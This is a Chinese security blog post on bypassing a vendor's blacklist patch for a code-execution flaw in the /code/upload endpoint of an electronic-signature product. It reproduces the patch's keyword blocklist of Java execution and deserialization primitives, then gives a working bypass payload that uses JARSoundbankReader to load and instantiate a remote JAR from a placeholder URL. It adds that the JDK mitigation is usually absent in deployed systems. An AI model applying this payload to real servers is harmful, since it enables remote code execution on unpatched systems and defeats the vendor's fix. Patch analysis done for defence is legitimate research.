注册 登录
某电子签章安全补丁绕过
Ha1ey 技术文章 132浏览 · 2025-02-24 16:13

Author:Ha1ey


本文章仅供学习交流使用,文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
前言
image-20250224143313833.png
分析
这里是一个历史漏洞的补丁分析绕过。
几年前披露过/code/upload接口存在一个代码执行漏洞,官方也是一直有黑名单补丁去过滤。此接口具体漏洞这里不做分析,网上可以搜到具体分析文章。
叮~,补丁到手,找到对应的过滤方法com.qiyuesuo.security.patch.filter.wrapper.CustomCodeRequestWrapper#getParts
image-20250224144120594.png
可以看到关键字主要SENSITIVE_KEY_LISTS这个list,内容如下(截止目前2/24日最新补丁)
Runtime
Process
ProcessBuilder
SpelExpressionParser
invoke
Class.forName
newInstance
ClassLoader
Constructor
ObjectInputStream
ScriptEngine
parseExpression
getDeclaredField
setAccessible
getMethod
lookup
freemarker
security
Base64
SerializationUtils
deserialize
static
Yaml
JdbcRowSetImpl
Transformer
AgentManager
过滤大部分关于反序列、表达式注入的函数方法。
这里找到了另一种黑名单中不存在的
new com.sun.media.sound.JARSoundbankReader().getSoundbank(new java.net.URL("http://xxxxxx/xxxx.jar"));
JARSoundbankReader
利用点位于com.sun.media.sound.JARSoundbankReader#getSoundbank(java.net.URL)方法
public Soundbank getSoundbank(URL var1) throws InvalidMidiDataException, IOException {
Objects.requireNonNull(var1);
if (Boolean.getBoolean("jdk.sound.jarsoundbank") && isZIP(var1)) {
ArrayList var2 = new ArrayList();
URLClassLoader var3 = URLClassLoader.newInstance(new URL[]{var1});
InputStream var4 = var3.getResourceAsStream("META-INF/services/javax.sound.midi.Soundbank");
if (var4 == null) {
return null;
} else {
try {
BufferedReader var5 = new BufferedReader(new InputStreamReader(var4));

for(String var6 = var5.readLine(); var6 != null; var6 = var5.readLine()) {
if (!var6.startsWith("#")) {
try {
Class var7 = Class.forName(var6.trim(), false, var3);
if (Soundbank.class.isAssignableFrom(var7)) {
Object var8 = ReflectUtil.newInstance(var7);
var2.add((Soundbank)var8);
}
} catch (ClassNotFoundException var14) {
} catch (InstantiationException var15) {
} catch (IllegalAccessException var16) {
}
}
}
} finally {
var4.close();
}

if (var2.size() == 0) {
return null;
} else if (var2.size() == 1) {
return (Soundbank)var2.get(0);
} else {
SimpleSoundbank var18 = new SimpleSoundbank();

for(Soundbank var20 : var2) {
var18.addAllInstruments(var20);
}

return var18;
}
}
} else {
return null;
}
}
可以看到遵循了SPI机制,动态加载javax.sound.midi.Soundbank的实现类。
这里有一个问题:
官方在JDK8u362-b08加了限制,默认jdk.sound.jarsoundbank是不开的,需要我们手动去开,但是这套系统的JDK环境基本都到不了362这个版本,实际都是可以利用的。
image-20250224155313794.png
image-20250224155244618.png
最后
image-20250224155942507.png
image-20250224160028576.png
image-20250224160049275.png
0 人收藏 0 人喜欢 转载 分享
0 条评论
某人
表情
可输入字

没有评论

先知社区
本站/app由 提供技术和产品支持